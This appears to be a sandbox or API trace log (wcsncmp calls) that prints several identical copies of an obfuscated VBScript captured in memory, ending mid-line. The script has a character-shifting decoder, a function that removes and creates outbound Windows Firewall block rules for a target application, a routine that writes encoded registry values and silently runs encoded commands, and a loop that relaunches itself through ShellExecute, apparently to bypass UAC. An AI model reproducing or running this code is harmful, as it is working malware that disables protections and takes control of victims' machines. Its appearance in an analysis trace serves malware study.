bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.277] wcsncmp (_String1="or Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.277] wcsncmp (_String1="r Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.278] wcsncmp (_String1=" Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.278] wcsncmp (_String1="Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 